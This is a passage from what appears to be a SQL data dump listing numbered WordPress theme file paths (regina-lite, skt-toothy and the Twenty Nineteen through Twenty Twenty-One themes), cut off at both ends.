/customizer.min.js'),(2553,'wp-content/themes/regina-lite/layout/js/plugins/customizer/customizer.min.js.map'),(2554,'wp-content/themes/regina-lite/layout/js/plugins/html5shiv/html5.js'),(2555,'wp-content/themes/regina-lite/layout/js/plugins/html5shiv/html5.min.js'),(2556,'wp-content/themes/regina-lite/layout/js/plugins/html5shiv/html5.min.js.map'),(2557,'wp-content/themes/regina-lite/layout/js/plugins/lazyload/lazyload.js'),(2558,'wp-content/themes/regina-lite/layout/js/plugins/lazyload/lazyload.min.js'),(2559,'wp-content/themes/regina-lite/layout/js/plugins/lazyload/lazyload.min.js.map'),(2560,'wp-content/themes/regina-lite/layout/js/plugins/navigation/navigation.js'),(2561,'wp-content/themes/regina-lite/layout/js/plugins/navigation/navigation.min.js'),(2562,'wp-content/themes/regina-lite/layout/js/plugins/navigation/navigation.min.js.map'),(2563,'wp-content/themes/regina-lite/layout/js/plugins/owl-carousel/owl-carousel.js'),(2564,'wp-content/themes/regina-lite/layout/js/plugins/owl-carousel/owl-carousel.min.js'),(2565,'wp-content/themes/regina-lite/layout/js/plugins/owl-carousel/owl-carousel.min.js.map'),(2566,'wp-content/themes/regina-lite/layout/js/plugins/pace/index.html'),(2567,'wp-content/themes/regina-lite/layout/js/plugins/pace/pace.js'),(2568,'wp-content/themes/regina-lite/layout/js/plugins/pace/pace.min.js'),(2569,'wp-content/themes/regina-lite/layout/js/plugins/pace/pace.min.js.map'),(2570,'wp-content/themes/regina-lite/layout/js/plugins/skip-link-focus-fix/skip-link-focus-fix.js'),(2571,'wp-content/themes/regina-lite/layout/js/plugins/skip-link-focus-fix/skip-link-focus-fix.min.js'),(2572,'wp-content/themes/regina-lite/layout/js/plugins/skip-link-focus-fix/skip-link-focus-fix.min.js.map'),(2573,'wp-content/themes/regina-lite/layout/js/plugins/waypoints/waypoints.js'),(2574,'wp-content/themes/regina-lite/layout/js/plugins/waypoints/waypoints.min.js'),(2575,'wp-content/themes/regina-lite/layout/js/plugins/waypoints/waypoints.min.js.map'),(2576,'wp-content/themes/regina-lite/layout/js/plugins.js'),(2577,'wp-content/themes/regina-lite/layout/js/plugins.min.js'),(2578,'wp-content/themes/regina-lite/layout/js/plugins.min.js.map'),(2579,'wp-content/themes/regina-lite/layout/js/preloader.js'),(2580,'wp-content/themes/regina-lite/layout/js/preloader.min.js'),(2581,'wp-content/themes/regina-lite/layout/js/preloader.min.js.map'),(2582,'wp-content/themes/regina-lite/license.txt'),(2583,'wp-content/themes/regina-lite/page-templates/blog-template.php'),(2584,'wp-content/themes/regina-lite/page-templates/sidebar-left.php'),(2585,'wp-content/themes/regina-lite/page-templates/sidebar-right.php'),(2586,'wp-content/themes/regina-lite/page-templates/template-homepage.php'),(2587,'wp-content/themes/regina-lite/page.php'),(2588,'wp-content/themes/regina-lite/screenshot.jpg'),(2589,'wp-content/themes/regina-lite/search.php'),(2590,'wp-content/themes/regina-lite/searchform.php'),(2591,'wp-content/themes/regina-lite/sections/section-breadcrumb.php'),(2592,'wp-content/themes/regina-lite/sections/section-home-features.php'),(2593,'wp-content/themes/regina-lite/sections/section-home-our-team.php'),(2594,'wp-content/themes/regina-lite/sections/section-home-slider.php'),(2595,'wp-content/themes/regina-lite/sections/section-home-speak.php'),(2596,'wp-content/themes/regina-lite/sections/section-home-testimonials.php'),(2597,'wp-content/themes/regina-lite/sections/section-news.php'),(2598,'wp-content/themes/regina-lite/sections/section-page-header.php'),(2599,'wp-content/themes/regina-lite/sidebar.php'),(2600,'wp-content/themes/regina-lite/single.php'),(2601,'wp-content/themes/regina-lite/style.css'),(2602,'wp-content/themes/regina-lite/template-parts/content-none.php'),(2603,'wp-content/themes/regina-lite/template-parts/content-page.php'),(2604,'wp-content/themes/regina-lite/template-parts/content-search.php'),(2605,'wp-content/themes/regina-lite/template-parts/content-single.php'),(2606,'wp-content/themes/regina-lite/template-parts/content.php'),(2607,'wp-content/themes/skt-toothy/404.php'),(2608,'wp-content/themes/skt-toothy/archive.php'),(2609,'wp-content/themes/skt-toothy/category.php'),(2610,'wp-content/themes/skt-toothy/change_log.txt'),(2611,'wp-content/themes/skt-toothy/comments.php'),(2612,'wp-content/themes/skt-toothy/content-single.php'),(2613,'wp-content/themes/skt-toothy/content.php'),(2614,'wp-content/themes/skt-toothy/css/nivo-slider.css'),(2615,'wp-content/themes/skt-toothy/css/responsive.css'),(2616,'wp-content/themes/skt-toothy/css/style_base.css'),(2617,'wp-content/themes/skt-toothy/customize-pro/example-1/class-customize.php'),(2618,'wp-content/themes/skt-toothy/customize-pro/example-1/customize-controls.css'),(2619,'wp-content/themes/skt-toothy/customize-pro/example-1/customize-controls.js'),(2620,'wp-content/themes/skt-toothy/customize-pro/example-1/section-pro.php'),(2621,'wp-content/themes/skt-toothy/editor-style.css'),(2622,'wp-content/themes/skt-toothy/footer.php'),(2623,'wp-content/themes/skt-toothy/front-page.php'),(2624,'wp-content/themes/skt-toothy/functions.php'),(2625,'wp-content/themes/skt-toothy/header.php'),(2626,'wp-content/themes/skt-toothy/image.php'),(2627,'wp-content/themes/skt-toothy/images/footer-icon-email.png'),(2628,'wp-content/themes/skt-toothy/images/footer-icon-phone.png'),(2629,'wp-content/themes/skt-toothy/images/free-vs-pro.png'),(2630,'wp-content/themes/skt-toothy/images/icon-clock.png'),(2631,'wp-content/themes/skt-toothy/images/icon-email.png'),(2632,'wp-content/themes/skt-toothy/images/icon-fb.png'),(2633,'wp-content/themes/skt-toothy/images/icon-gp.png'),(2634,'wp-content/themes/skt-toothy/images/icon-in.png'),(2635,'wp-content/themes/skt-toothy/images/icon-medical.png'),(2636,'wp-content/themes/skt-toothy/images/icon-medical2.png'),(2637,'wp-content/themes/skt-toothy/images/icon-phone.png'),(2638,'wp-content/themes/skt-toothy/images/icon-tw.png'),(2639,'wp-content/themes/skt-toothy/images/img_404.jpg'),(2640,'wp-content/themes/skt-toothy/images/list-arrow.png'),(2641,'wp-content/themes/skt-toothy/images/loading.gif'),(2642,'wp-content/themes/skt-toothy/images/location-icon.png'),(2643,'wp-content/themes/skt-toothy/images/mobile_nav_right.png'),(2644,'wp-content/themes/skt-toothy/images/page-image-1.png'),(2645,'wp-content/themes/skt-toothy/images/page-image-2.png'),(2646,'wp-content/themes/skt-toothy/images/page-image-3.png'),(2647,'wp-content/themes/skt-toothy/images/page-image-4.png'),(2648,'wp-content/themes/skt-toothy/images/search-icon.png'),(2649,'wp-content/themes/skt-toothy/images/sktskill.jpg'),(2650,'wp-content/themes/skt-toothy/images/slide-nav.png'),(2651,'wp-content/themes/skt-toothy/images/slides/slider1.jpg'),(2652,'wp-content/themes/skt-toothy/images/slides/slider2.jpg'),(2653,'wp-content/themes/skt-toothy/images/slides/slider3.jpg'),(2654,'wp-content/themes/skt-toothy/inc/about-themes.php'),(2655,'wp-content/themes/skt-toothy/inc/custom-header.php'),(2656,'wp-content/themes/skt-toothy/inc/customizer.php'),(2657,'wp-content/themes/skt-toothy/inc/extras.php'),(2658,'wp-content/themes/skt-toothy/inc/template-tags.php'),(2659,'wp-content/themes/skt-toothy/index.php'),(2660,'wp-content/themes/skt-toothy/js/custom.js'),(2661,'wp-content/themes/skt-toothy/js/customize-preview.js'),(2662,'wp-content/themes/skt-toothy/js/jquery.nivo.slider.js'),(2663,'wp-content/themes/skt-toothy/license.txt'),(2664,'wp-content/themes/skt-toothy/no-results.php'),(2665,'wp-content/themes/skt-toothy/page.php'),(2666,'wp-content/themes/skt-toothy/readme.txt'),(2667,'wp-content/themes/skt-toothy/screenshot.png'),(2668,'wp-content/themes/skt-toothy/search.php'),(2669,'wp-content/themes/skt-toothy/searchform.php'),(2670,'wp-content/themes/skt-toothy/sidebar.php'),(2671,'wp-content/themes/skt-toothy/single.php'),(2672,'wp-content/themes/skt-toothy/style.css'),(2673,'wp-content/themes/skt-toothy/woocommerce.php'),(2674,'wp-content/themes/twentynineteen/404.php'),(2675,'wp-content/themes/twentynineteen/archive.php'),(2676,'wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php'),(2677,'wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php'),(2678,'wp-content/themes/twentynineteen/comments.php'),(2679,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff'),(2680,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2'),(2681,'wp-content/themes/twentynineteen/footer.php'),(2682,'wp-content/themes/twentynineteen/functions.php'),(2683,'wp-content/themes/twentynineteen/header.php'),(2684,'wp-content/themes/twentynineteen/image.php'),(2685,'wp-content/themes/twentynineteen/images/pattern_01.jpg'),(2686,'wp-content/themes/twentynineteen/images/pattern_02.jpg'),(2687,'wp-content/themes/twentynineteen/images/pattern_03.jpg'),(2688,'wp-content/themes/twentynineteen/images/pattern_04.jpg'),(2689,'wp-content/themes/twentynineteen/inc/back-compat.php'),(2690,'wp-content/themes/twentynineteen/inc/block-patterns.php'),(2691,'wp-content/themes/twentynineteen/inc/color-patterns.php'),(2692,'wp-content/themes/twentynineteen/inc/customizer.php'),(2693,'wp-content/themes/twentynineteen/inc/helper-functions.php'),(2694,'wp-content/themes/twentynineteen/inc/icon-functions.php'),(2695,'wp-content/themes/twentynineteen/inc/template-functions.php'),(2696,'wp-content/themes/twentynineteen/inc/template-tags.php'),(2697,'wp-content/themes/twentynineteen/index.php'),(2698,'wp-content/themes/twentynineteen/js/customize-controls.js'),(2699,'wp-content/themes/twentynineteen/js/customize-preview.js'),(2700,'wp-content/themes/twentynineteen/js/priority-menu.js'),(2701,'wp-content/themes/twentynineteen/js/skip-link-focus-fix.js'),(2702,'wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js'),(2703,'wp-content/themes/twentynineteen/package-lock.json'),(2704,'wp-content/themes/twentynineteen/package.json'),(2705,'wp-content/themes/twentynineteen/page.php'),(2706,'wp-content/themes/twentynineteen/postcss.config.js'),(2707,'wp-content/themes/twentynineteen/print.css'),(2708,'wp-content/themes/twentynineteen/print.scss'),(2709,'wp-content/themes/twentynineteen/readme.txt'),(2710,'wp-content/themes/twentynineteen/sass/_normalize.scss'),(2711,'wp-content/themes/twentynineteen/sass/blocks/_blocks.scss'),(2712,'wp-content/themes/twentynineteen/sass/elements/_elements.scss'),(2713,'wp-content/themes/twentynineteen/sass/elements/_lists.scss'),(2714,'wp-content/themes/twentynineteen/sass/elements/_tables.scss'),(2715,'wp-content/themes/twentynineteen/sass/forms/_buttons.scss'),(2716,'wp-content/themes/twentynineteen/sass/forms/_fields.scss'),(2717,'wp-content/themes/twentynineteen/sass/forms/_forms.scss'),(2718,'wp-content/themes/twentynineteen/sass/layout/_layout.scss'),(2719,'wp-content/themes/twentynineteen/sass/media/_captions.scss'),(2720,'wp-content/themes/twentynineteen/sass/media/_galleries.scss'),(2721,'wp-content/themes/twentynineteen/sass/media/_media.scss'),(2722,'wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss'),(2723,'wp-content/themes/twentynineteen/sass/mixins/_utilities.scss'),(2724,'wp-content/themes/twentynineteen/sass/modules/_accessibility.scss'),(2725,'wp-content/themes/twentynineteen/sass/modules/_alignments.scss'),(2726,'wp-content/themes/twentynineteen/sass/modules/_clearings.scss'),(2727,'wp-content/themes/twentynineteen/sass/navigation/_links.scss'),(2728,'wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss'),(2729,'wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss'),(2730,'wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss'),(2731,'wp-content/themes/twentynineteen/sass/navigation/_navigation.scss'),(2732,'wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss'),(2733,'wp-content/themes/twentynineteen/sass/site/_site.scss'),(2734,'wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss'),(2735,'wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss'),(2736,'wp-content/themes/twentynineteen/sass/site/header/_site-header.scss'),(2737,'wp-content/themes/twentynineteen/sass/site/primary/_archives.scss'),(2738,'wp-content/themes/twentynineteen/sass/site/primary/_comments.scss'),(2739,'wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss'),(2740,'wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss'),(2741,'wp-content/themes/twentynineteen/sass/typography/_copy.scss'),(2742,'wp-content/themes/twentynineteen/sass/typography/_headings.scss'),(2743,'wp-content/themes/twentynineteen/sass/typography/_typography.scss'),(2744,'wp-content/themes/twentynineteen/sass/variables-site/_colors.scss'),(2745,'wp-content/themes/twentynineteen/sass/variables-site/_columns.scss'),(2746,'wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss'),(2747,'wp-content/themes/twentynineteen/sass/variables-site/_structure.scss'),(2748,'wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss'),(2749,'wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss'),(2750,'wp-content/themes/twentynineteen/screenshot.png'),(2751,'wp-content/themes/twentynineteen/search.php'),(2752,'wp-content/themes/twentynineteen/single.php'),(2753,'wp-content/themes/twentynineteen/style-editor-customizer.css'),(2754,'wp-content/themes/twentynineteen/style-editor-customizer.scss'),(2755,'wp-content/themes/twentynineteen/style-editor.css'),(2756,'wp-content/themes/twentynineteen/style-editor.scss'),(2757,'wp-content/themes/twentynineteen/style-rtl.css'),(2758,'wp-content/themes/twentynineteen/style.css'),(2759,'wp-content/themes/twentynineteen/style.scss'),(2760,'wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php'),(2761,'wp-content/themes/twentynineteen/template-parts/content/content-none.php'),(2762,'wp-content/themes/twentynineteen/template-parts/content/content-page.php'),(2763,'wp-content/themes/twentynineteen/template-parts/content/content-single.php'),(2764,'wp-content/themes/twentynineteen/template-parts/content/content.php'),(2765,'wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php'),(2766,'wp-content/themes/twentynineteen/template-parts/header/entry-header.php'),(2767,'wp-content/themes/twentynineteen/template-parts/header/site-branding.php'),(2768,'wp-content/themes/twentynineteen/template-parts/post/author-bio.php'),(2769,'wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php'),(2770,'wp-content/themes/twentytwenty/.stylelintrc.json'),(2771,'wp-content/themes/twentytwenty/404.php'),(2772,'wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css'),(2773,'wp-content/themes/twentytwenty/assets/css/editor-style-block.css'),(2774,'wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css'),(2775,'wp-content/themes/twentytwenty/assets/css/editor-style-classic.css'),(2776,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2'),(2777,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2'),(2778,'wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png'),(2779,'wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png'),(2780,'wp-content/themes/twentytwenty/assets/images/2020-square-1.png'),(2781,'wp-content/themes/twentytwenty/assets/images/2020-square-2.png'),(2782,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png'),(2783,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png'),(2784,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png'),(2785,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png'),(2786,'wp-content/themes/twentytwenty/assets/js/color-calculations.js'),(2787,'wp-content/themes/twentytwenty/assets/js/customize-controls.js'),(2788,'wp-content/themes/twentytwenty/assets/js/customize-preview.js'),(2789,'wp-content/themes/twentytwenty/assets/js/customize.js'),(2790,'wp-content/themes/twentytwenty/assets/js/editor-script-block.js'),(2791,'wp-content/themes/twentytwenty/assets/js/index.js'),(2792,'wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js'),(2793,'wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php'),(2794,'wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php'),(2795,'wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php'),(2796,'wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php'),(2797,'wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php'),(2798,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php'),(2799,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php'),(2800,'wp-content/themes/twentytwenty/comments.php'),(2801,'wp-content/themes/twentytwenty/footer.php'),(2802,'wp-content/themes/twentytwenty/functions.php'),(2803,'wp-content/themes/twentytwenty/header.php'),(2804,'wp-content/themes/twentytwenty/inc/block-patterns.php'),(2805,'wp-content/themes/twentytwenty/inc/custom-css.php'),(2806,'wp-content/themes/twentytwenty/inc/starter-content.php'),(2807,'wp-content/themes/twentytwenty/inc/svg-icons.php'),(2808,'wp-content/themes/twentytwenty/inc/template-tags.php'),(2809,'wp-content/themes/twentytwenty/index.php'),(2810,'wp-content/themes/twentytwenty/package-lock.json'),(2811,'wp-content/themes/twentytwenty/package.json'),(2812,'wp-content/themes/twentytwenty/print.css'),(2813,'wp-content/themes/twentytwenty/readme.txt'),(2814,'wp-content/themes/twentytwenty/screenshot.png'),(2815,'wp-content/themes/twentytwenty/searchform.php'),(2816,'wp-content/themes/twentytwenty/singular.php'),(2817,'wp-content/themes/twentytwenty/style-rtl.css'),(2818,'wp-content/themes/twentytwenty/style.css'),(2819,'wp-content/themes/twentytwenty/template-parts/content-cover.php'),(2820,'wp-content/themes/twentytwenty/template-parts/content.php'),(2821,'wp-content/themes/twentytwenty/template-parts/entry-author-bio.php'),(2822,'wp-content/themes/twentytwenty/template-parts/entry-header.php'),(2823,'wp-content/themes/twentytwenty/template-parts/featured-image.php'),(2824,'wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php'),(2825,'wp-content/themes/twentytwenty/template-parts/modal-menu.php'),(2826,'wp-content/themes/twentytwenty/template-parts/modal-search.php'),(2827,'wp-content/themes/twentytwenty/template-parts/navigation.php'),(2828,'wp-content/themes/twentytwenty/template-parts/pagination.php'),(2829,'wp-content/themes/twentytwenty/templates/template-cover.php'),(2830,'wp-content/themes/twentytwenty/templates/template-full-width.php'),(2831,'wp-content/themes/twentytwentyone/.stylelintignore'),(2832,'wp-content/themes/twentytwentyone/.stylelintrc-css.json'),(2833,'wp-content/themes/twentytwentyone/.stylelintrc.json'),(2834,'wp-content/themes/twentytwentyone/404.php'),(2835,'wp-content/themes/twentytwentyone/archive.php'),(2836,'wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css'),(2837,'wp-content/themes/twentytwentyone/assets/css/ie-editor.css'),(2838,'wp-content/themes/twentytwentyone/assets/css/ie.css'),(2839,'wp-content/themes/twentytwentyone/assets/css/print.css'),(2840,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css'),(2841,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css'),(2842,'wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css'),(2843,'wp-content/themes/twentytwentyone/assets/css/style-editor.css'),(2844,'wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg'),(2845,'wp-content/themes/twentytwentyone/assets/images/Reading.jpg'),(2846,'wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg'),(2847,'wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg'),(2848,'wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg'),(2849,'wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg'),(2850,'wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg'),(2851,'wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg'),(2852,'wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg'),(2853,'wp-content/themes/twentytwentyone/assets/js/customize-helpers.js'),(2854,'wp-content/themes/twentytwentyone/assets/js/customize-preview.js'),(2855,'wp-content/themes/twentytwentyone/assets/js/customize.js'),(2856,'wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js'),(2857,'wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js'),(2858,'wp-content/themes/twentytwentyone/assets/js/editor.js'),(2859,'wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js'),(2860,'wp-content/themes/twentytwentyone/assets/js/polyfills.js'),(2861,'wp-content/themes/twentytwentyone/assets/js/primary-navigation.js'),(2862,'wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js'),(2863,'wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js'),(2864,'wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss'),(2865,'wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss'),(2866,'wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss'),(2867,'wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss'),(2868,'wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss'),(2869,'wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss'),(2870,'wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss'),(2871,'wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss'),(2872,'wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss'),(2873,'wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss'),(2874,'wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss'),(2875,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss'),(2876,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss'),(2877,'wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss'),(2878,'wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss'),(2879,'wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss'),(2880,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss'),(2881,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss'),(2882,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss'),(2883,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss'),(2884,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss'),(2885,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss'),(2886,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss'),(2887,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss'),(2888,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss'),(2889,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss'),(2890,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss'),(2891,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss'),(2892,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss'),(2893,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss'),(2894,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss'),(2895,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss'),(2896,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss'),(2897,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss'),(2898,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss'),(2899,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss'),(2900,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss'),(2901,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss'),(2902,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss'),(2903,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss'),(2904,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss'),(2905,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss'),(2906,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss'),(2907,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss'),(2908,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss'),(2909,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss'),(2910,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss'),(2911,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss'),(2912,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss'),(2913,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss'),(2914,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss'),(2915,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss'),(2916,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss'),(2917,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss'),(2918,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss'),(2919,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss'),(2920,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss'),(2921,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss'),(2922,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss'),(2923,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss'),(2924,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss'),(2925,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss'),(2926,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss'),(2927,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss'),(2928,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss'),(2929,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss'),(2930,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss'),(2931,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss'),(2932,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss'),(2933,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss'),(2934,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss'),(2935,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss'),(2936,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss'),(2937,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss'),(2938,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss'),(2939,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss'),(2940,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss'),(2941,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss'),(2942,'wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss'),(2943,'wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss'),(2944,'wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss'),(2945,'wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss'),(2946,'wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss'),(2947,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss'),(2948,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss'),(2949,'wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss'),(2950,'wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss'),(2951,'wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss'),(2952,'wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss'),(2953,'wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss'),(2954,'wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss'),(2955,'wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss'),(2956,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss'),(2957,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss'),(2958,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss'),(2959,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss'),(2960,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss'),(2961,'wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss'),(2962,'wp-content/themes/twentytwentyone/assets/sass/style-editor.scss'),(2963,'wp-content/themes/twentytwentyone/assets/sass/style.scss'),(2964,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php'),(2965,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php'),(2966,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php'),(2967,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php'),(2968,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php'),(2969,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php'),(2970,'wp-content/themes/twentytwentyone/comments.php'),(2971,'wp-content/themes/twentytwentyone/footer.php'),(2972,'wp-content/themes/twentytwentyone/functions.php'),(2973,'wp-content/themes/twentytwentyone/header.php'),(2974,'wp-content/themes/twentytwentyone/image.php'),(2975,'w